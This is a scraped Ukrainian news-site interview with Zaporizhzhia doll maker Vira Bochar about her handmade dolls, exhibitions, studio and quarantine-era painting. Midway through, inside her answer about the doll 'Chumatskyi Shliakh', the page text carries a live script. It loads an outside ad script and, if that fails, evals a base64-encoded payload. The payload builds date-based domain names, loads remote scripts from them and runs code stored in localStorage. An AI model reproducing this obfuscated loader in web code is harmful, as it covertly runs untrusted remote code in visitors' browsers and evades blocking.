Віра Бочарь, майстриня з виготовлення авторських ляльок: «Я побачила, який насправді цей світ — незвичайний світ, в якому ляльки живуть своїм життям, у кожної свій образ, характер, своя неповторна історія» (ІНТЕРВ’Ю)

Унікальність – це принада хендмейду, оскільки неможливо віднайти схожість з іншою річчю. Всі вироби хендмейду неповторні та особливі.

Хтось вважає таке заняття способом відпочити від рутини, а запорізька майстриня з виготовлення авторських ляльок впевнена, головна принада хендмейду – можливість втілювати в реальність всі фантазії і задуми майстра.

Віра Бочарь займається виготовленням ляльок близько десяти років. Вона з задоволенням бере участь у виставках, конкурсах, фестивалях, які проходять і в Україні, і за кордоном. Авторські ляльки Віри Бочарь були представлені на виставках у Києві, Запоріжжі, Одесі, Харкові, Івано-Франківську, Таллінні, Тбілісі. Майстриня поділилася процесом створення такої рукотворної краси та долею її виробів.

Ляльки – це моє хобі! Весь вільний час я присвячую їм. Це навіть більше, ніж просто хобі: адже виготовлення ляльок — це частина мого життя, яка приносить щире задоволення.

Віра Бочарь отримала технічну освіту, але ще з дитинства полюбляє шити, в’язати, вишивати. Всі ці навички стали у нагоді, коли вона познайомилася з дивовижним світом ляльок.

«Шовк ніжних почуттів» Майя

Коли відчули потяг до такого мистецтва? Якою була ваша перша лялька?

Десять років тому абсолютно випадково я відкрила для себе вражаючий світ ляльок. Якось одного разу, блукаючи просторами Інтернету, побачила незвичайну ляльку — трохи дивну, в усякому разі для мене, з неправильними пропорціями, довгими руками і ногами, практично без обличчя. Але було в ній щось таке, що зачепило мене, привернуло мою увагу. Завдяки щасливому випадку в цій статті я знайшла докладний майстер-клас зі створення цієї ляльки. Вже через два дні у мене народилася моя найперша лялечка.

Це була лялька тильда — Різдвяний янгол. Вона зараз знаходиться у мене вдома, бо саме вона стала моїм талісманом і провідником в чарівний світ ляльок! Я побачила, який насправді цей світ — незвичайний світ, в якому ляльки живуть своїм життям, у кожної свій образ, характер, своя неповторна історія.

Як і багато інших майстрів, я починала з текстильних ляльок (тильди, примітивні, Вальдорфські ляльки, в’язані, валяні іграшки). Потім, через деякий час, я почала робити ляльок з запікаємого пластика і самозастигаючих матеріалів.

Світлина з особистого архіву Віри Бочарь

Приблизна кількість ваших робіт?

Складно точно відповісти, бо якось ніколи не рахувала. Більше тридцяти ляльок, створених із пластика, а текстильних, в’язаних, валяних – то взагалі не рахувала, але багатенько!

На вашу думку, хендмейд популярний наразі в Україні?

Речі, виготовлені власноруч, завжди користувалися попитом. Хоча наразі вже важко чимось здивувати наших користувачів, тому треба вигадувати щось нове, цікаве, самобутнє, неповторне і високої якості.

Це інтер’єрний виріб чи хтось купує і для малечі?

Такі авторські ляльки – це не іграшки, не дитячі забавки. Вони можуть стати частиною інтер’єру або прикрасою колекції. Їх купують як подарунок для друзів або близьких людей, або навіть і для себе! Бо багато дорослих у душі лишаються дітьми.

Простір для натхнення, звісно, безмежний, але все ж таки, як створити ідеальний образ ляльки? Чи це виходить підсвідомо?

Простір для натхнення, дійсно, безмежний! Це може бути що завгодно: і якась подія, і пережите почуття, прочитана книга або переглянутий фільм, або, навіть, якась намистинка або стрічечка, що потрапила тобі в око. Іноді я створюю ляльок для якого-небудь тематичного проєкту. Тоді треба ретельно вивчити тему, аби детально відтворити в ляльці поставлене завдання.

Світлина з особистого архіву Віри Бочарь

Чи відтворювали ви відомих людей, героїв фільмів чи казок, просто знайомих?

Так, у мене був один такий випадок. Мені замовили портретну ляльку головного героя фільму «Острів скарбів маппетів» — фільм режисера Брайана Хенсона. Роль Джона Сільвера зіграв Тімоті Джеймс Каррі. Мені довелося багато разів переглядати цей фільм, щоб якнайточніше відтворити і риси обличчя, і деталі костюму. Приблизно за місяць я зробила цю ляльку. Замовниця була дуже задоволена, і зараз ця лялька живе десь в Англії.

Гордість вашої колекції?

Я дуже тішуся кожного разу, коли закінчую чергову ляльку! Бо кожна нова лялька – це новий крок, новий досвід, нова можливість для подальшого розвитку! Всі мої роботи для мене важливі – кожну з них люблю! Але про одну можу розповісти більш детально. Минулого року я створила ляльку «Чумацький Шлях» (всі ляльки мають або ім’я, або назву композиції). Вона вийшла саме такою, якою я її собі уявляла. Торік у мене відбулася персональна виставка з нагоди 10-річчя мого творчого шляху. Довгих вагань щодо назви і афіші цієї виставки не було. Ляльку я винесла на афішу, а виставку так і назвала — «Мій Чумацький Шлях».

Чумацький Шлях

Чому саме така назва?

Коли я була ще малою, я кожне літо була в селі у моєї бабусі. І ця лялька – це такі своєрідні мої дитячі спогади – українське село, ніч, чорне небо, зорі і вгорі на небі світла смуга Чумацького Шляху. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Ми всі пам’ятаємо легенди про чумаків, які ходили у далекі краї за сіллю і не знали, що їх там очікує. Мені здається, так і я постійно знаходжуся в якомусь русі, йду вперед і також не знаю, що я побачу, з ким я зустрінусь, що знайду, що мене чекає попереду. Але я маю надію, що ляльки і надалі будуть супроводжувати мене на моєму шляху.

Опишіть процес створення такого рукотворного виробу

Спочатку із спеціальних матеріалів виліплюються голівонька, ручки, ніжки. Потім це розписується фарбами, приклеюється волосся. Далі робимо каркас, збираємо ляльку, одягаємо. Взуття та інші аксесуари теж робимо самі.
На створення такої ляльки у мене йде не менше одного місяця. Але у кожного майстра по-різному. Це залежить від багатьох факторів – наявність потрібного матеріалу, вільного часу, настрою, натхнення, самопочуття та ін.

Світлина з особистого архіву Віри Бочарь

Чи складно «оживити» ляльку, тобто надати її обличчю емоції?

Вважається, що лялька починає жити, коли в неї з’являються очі. Очі – дзеркало душі. Своїм виробам я розписую очі олійною фарбою. І коли з’являються очі, з’являється погляд, то вже видно і її характер.

Щодо самого одягу, ви створюєте ескіз? Які використовуєте матеріали?

Перед тим, як починаю робити ляльку, я звісно, придумую певний образ, кольорову гаму і деталі костюму, колір волосся та очей. Я не малюю це на папері, а тримаю в голові. Але іноді так виходить, що в процесі лялька сама диктує мені, якою вона хоче бути. І тоді доводиться змінювати і підібрані раніше тканини, і колір волосся, і всі інші матеріали. У результаті лялька виходить зовсім іншою, ніж планувалось спочатку.

Ви — керівник творчої студії «Біла птаха» у Запоріжжі. Розкажіть про роботу студії.

У нашому місті дуже багато творчих, талановитих, зацікавлених людей, що полюблять створювати різноманітні ляльки та іграшки. І щоб якось об’єднати їх, дати можливість проявити себе, показати свої витвори — була створена наша творча студія.

Майстри нашої студії постійно беруть участь у виставках та проєктах, що ми проводимо. Ми дуже плідно співпрацюємо с деякими закладами нашого міста. Наприклад, у відділі мистецтв Запорізької обласної бібліотеки наші майстри мають змогу проводити свої персональні виставки. Також ми реалізували такі тематичні проєкти: «Перехрестя» та «На перехресті епох» в музеї техніки «Фаетон»; «Дивовижні» та «За рамками» в арт-галереї Ольги Гречухи. А наша виставка «Лялькове літо», яку ми проводимо в ПК «Орбіта» кожного року влітку, вже стала традиційною.

Чи прибуткове таке мистецтво в Україні? Ви відправляєте свій товар в інші країни?

В Україні є талановиті, відомі майстри, роботи яких добре продаються. Але не думаю, що наразі таке мистецтво є прибутковим в Україні. Я говорю про себе. Хоча інколи трапляються такі приємні моменти, коли мою ляльку хтось бажає мати у себе вдома. І тоді я користуюсь «Укрпоштою» чи іншим перевізником.

«Танок на хвилі» «Осіння прогулянка»

Як вплинув карантин на ваш емоційний стан? Поява вільного часу надихнула на творчість чи навпаки?

Ой, цей карантин! Зруйнував всі плани, вибив зі звичного ритму життя. Емоційний стан на початку був не в найкращому вигляді. Було дуже складно.

Але з іншого боку, наявність вільного часу проявила в мені нову сторону моєї особистості. Я почала малювати! Я не вміла цього робити ні в дитинстві, ні в більш зрілі роки. Я ніколи не думала, що в мене може щось вийти. Та я і не намагалась взагалі спробувати. А тут в один день прокинулась, взяла до рук пензлик, фарби, знайшла в Інтернеті майстер-клас і намалювала свою першу картину! І вийшло! І було ще багато різних малюнків. Ні, я не стала художником. Ні, я не можу себе так назвати. Але ще одна грань творчості відкрилась переді мною.

Яка вона «творча особистість»?

Кожна «творча особистість» унікальна і неповторна! Іноді здається, що вона живе в зовсім іншому своєму світі. Не намагайтеся змінити таких людей, спробуйте їх зрозуміти, якщо вам це треба.

Які ваші творчі плани на майбутнє?\

Зараз дуже складно планувати своє майбутнє. Ми бачимо як карантин зруйнував багато наших планів. Деякі заходи були перенесені на інший час, деякі взагалі були відмінені. Маю надію, коли закінчиться карантин, ми повернемося до нашого звичного способу життя. Будуть і нові ляльки, і виставки, і проєкти. Трохи зачекаємо.

Розмову провела Тетяна Харкевич (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/vira-bochar-majstrinya-z-vigotovlennya-avtorskih-lyalok-ya-pobachila-yakij-naspravdi-tsej-svit-nezvichajnij-svit-v-yakomu-lyalki-zhivut-svoyim-zhittyam-u-kozhnoyi-svij-obraz-harakter-svoya-nepovtorna/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top